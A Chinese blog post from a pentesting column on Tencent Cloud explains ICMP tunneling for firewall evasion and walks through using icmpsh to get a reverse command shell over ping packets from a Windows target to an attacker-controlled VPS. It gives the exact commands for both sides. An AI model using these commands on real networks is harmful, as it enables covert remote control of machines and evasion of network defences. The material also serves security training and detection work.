前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

作者头像
谢公子
发布2022-01-19 20:50:02
6580
发布2022-01-19 20:50:02
举报
文章被收录于专栏:谢公子学安全谢公子学安全

使用ICMP进行命令控制(Icmpsh)

目录

ICMP隧道

使用ICMP进行命令控制(Icmpsh)

ICMP隧道

ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。

在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙一般不会屏蔽ping的数据包),实现不受限制的访问访问。

使用ICMP进行命令控制(Icmpsh)

适用场景:目标机器是Windows服务器的情况

代码语言:javascript
复制
git clone https://github.com/inquisb/icmpsh.git     #先下载icmpsh工具

VPS的操作

代码语言:javascript
复制
sysctl -w net.ipv4.icmp_echo_ignore_all=1       #关闭icmp回复,如果要开启icmp回复,该值设置为0
python2 icmpsh_m.py 172.31.226.161 x.x.x.x      #运行,第一个IP是VPS的eth0网卡IP,第二个IP是目标机器出口的公网IP

目标机器的操作:

代码语言:javascript
复制
icmpsh.exe -t x.x.x.x -d 500 -b 30 -s 128

抓包,可以看到两者之间通信都是icmp的数据包

相关文章:

内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)

内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道

内网转发及隐蔽隧道 | 端口转发和端口映射

内网渗透 | 内网转发工具的使用

责编:vivian

来源:谢公子博客

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-10-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 谢公子学安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
弹性公网 IP
弹性公网 IP(Elastic IP,EIP)是可以独立购买和持有,且在某个地域下固定不变的公网 IP 地址,可以与 CVM、NAT 网关、弹性网卡和高可用虚拟 IP 等云资源绑定,提供访问公网和被公网访问能力;还可与云资源的生命周期解耦合,单独进行操作;同时提供多种计费模式,您可以根据业务特点灵活选择,以降低公网成本。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档